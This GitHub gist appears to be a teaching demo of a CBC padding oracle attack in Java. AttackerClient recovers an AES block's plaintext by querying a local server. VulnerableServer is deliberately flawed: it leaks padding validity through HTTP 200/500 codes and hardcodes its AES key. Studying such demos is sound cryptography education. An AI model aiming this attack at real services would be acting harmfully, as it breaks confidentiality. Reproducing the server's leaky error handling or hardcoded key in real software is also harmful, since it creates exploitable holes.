Skip to content

Instantly share code, notes, and snippets.

@ThierryAbalea
Created March 26, 2014 02:36
Show Gist options
  • Save ThierryAbalea/9775933 to your computer and use it in GitHub Desktop.
Save ThierryAbalea/9775933 to your computer and use it in GitHub Desktop.
[Cryptography] Oracle Padding Attack on one block
import javax.xml.bind.DatatypeConverter;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.Arrays;
public class AttackerClient {
public static final int BLOCK_SIZE = 16;
public final static byte[] IV = {
-92, -59, -117, 88, -22, -48, 28, 10, 91, -116, 35, 61, 75, -88, -111, 48};
public final static byte[] CIPHER_TEXT = {
61, -49, -126, -54, 18, 76, 66, -62, -68, -66, -71, -90, 30, -103, -10, 7};
public static final int HTTP_PORT = 8080;
public static final int OK_CODE = 200;
public static void main(String[] args) throws Exception {
decrypt();
}
private static void decrypt() throws Exception {
byte[] intermediate = new byte[BLOCK_SIZE];
byte[] plaintext = new byte[BLOCK_SIZE];
for (int byteIndex = BLOCK_SIZE - 1; byteIndex >= 0; byteIndex--) {
int paddingByte = BLOCK_SIZE - byteIndex;
byte[] previousCipherText = new byte[BLOCK_SIZE];
for (int i = BLOCK_SIZE - 1; i > byteIndex; i--) {
previousCipherText[i] = (byte) (intermediate[i] ^ paddingByte);
}
byte lastByte = computeByteWithValidPadding(previousCipherText, byteIndex);
intermediate[byteIndex] = (byte) (lastByte ^ paddingByte);
plaintext[byteIndex] = (byte) (intermediate[byteIndex] ^ IV[byteIndex]);
System.out.println("plaintext[" + byteIndex + "]: " + plaintext[byteIndex]);
}
byte[] plaintextWithoutPadding = Arrays.copyOf(plaintext, BLOCK_SIZE - plaintext[BLOCK_SIZE - 1]);
System.out.println("plaintext: " + new String(plaintextWithoutPadding));
}
private static byte computeByteWithValidPadding(byte[] iv, int byteIndex) throws Exception {
byte lastByte = 0;
boolean goodPadding = false;
while (!goodPadding) {
iv[byteIndex] = lastByte;
byte[] encryptedMessage = new byte[iv.length + CIPHER_TEXT.length];
System.arraycopy(iv, 0, encryptedMessage, 0, iv.length);
System.arraycopy(CIPHER_TEXT, 0, encryptedMessage, iv.length, CIPHER_TEXT.length);
String encodedEncryptedMessage = DatatypeConverter.printBase64Binary(encryptedMessage);
URL url = new URL("http://localhost:" + HTTP_PORT + "/send?encryptedMessage=" + encodedEncryptedMessage);
HttpURLConnection connection = (HttpURLConnection) url.openConnection();
int responseCode = connection.getResponseCode();
connection.disconnect();
if (responseCode == OK_CODE) {
goodPadding = true;
} else {
lastByte++;
}
}
return lastByte;
}
}
import com.sun.net.httpserver.Headers;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.security.GeneralSecurityException;
import java.security.InvalidKeyException;
public class VulnerableServer {
public static final int BLOCK_SIZE = 16;
public final static byte[] KEY = {
65, -36, -117, -28, 20, 35, 92, 74, 3, 119, 110, -120, -103, -25, -23, -65,
-44, 114, 45, -73, 33, 13, -120, 104, 70, 101, -29, 42, -128, 22, -32, -30};
public static final int HTTP_PORT = 8080;
public static final int OK_CODE = 200;
public static final int INTERNAL_ERROR_CODE = 500;
public static void main(String[] args) throws IOException {
InetSocketAddress addr = new InetSocketAddress(HTTP_PORT);
HttpServer server = HttpServer.create(addr, 0);
server.createContext("/", new CryptoHttpHandler());
server.start();
System.out.println("Server is listening on port " + HTTP_PORT);
}
private static class CryptoHttpHandler implements HttpHandler {
private int numberOfDecryptions = 0;
public void handle(HttpExchange exchange) throws IOException {
String requestMethod = exchange.getRequestMethod();
if (requestMethod.equalsIgnoreCase("GET")) {
String query = exchange.getRequestURI().getQuery();
String encodedEncryptedMessage = query.substring(query.indexOf('=') + 1, query.length());
byte[] encryptedMessage = DatatypeConverter.parseBase64Binary(encodedEncryptedMessage);
byte[] iv = new byte[BLOCK_SIZE];
System.arraycopy(encryptedMessage, 0, iv, 0, BLOCK_SIZE);
byte[] cipherText = new byte[BLOCK_SIZE];
System.arraycopy(encryptedMessage, BLOCK_SIZE, cipherText, 0, BLOCK_SIZE);
int statusCode;
try {
decrypt(cipherText, iv);
statusCode = OK_CODE;
} catch (InvalidKeyException exc) {
if ("Illegal key size".equals(exc.getMessage())) {
System.out.println("In order to support 256-bit keys, install " +
"the Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\n" +
"For the JSE 7, go there http://www.oracle.com/technetwork/java/javase/downloads/jce-7-download-432124.html");
System.exit(-1);
}
statusCode = INTERNAL_ERROR_CODE;
} catch (GeneralSecurityException exc) {
// javax.crypto.BadPaddingException implements GeneralSecurityException
statusCode = INTERNAL_ERROR_CODE;
}
numberOfDecryptions++;
if (numberOfDecryptions % 100 == 0) {
System.out.print(".");
}
Headers responseHeaders = exchange.getResponseHeaders();
responseHeaders.set("Content-Type", "text/plain");
exchange.sendResponseHeaders(statusCode, 0);
exchange.close();
}
}
}
public static byte[] decrypt(byte[] cipherText, byte[] iv) throws GeneralSecurityException {
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(iv));
return cipher.doFinal(cipherText);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment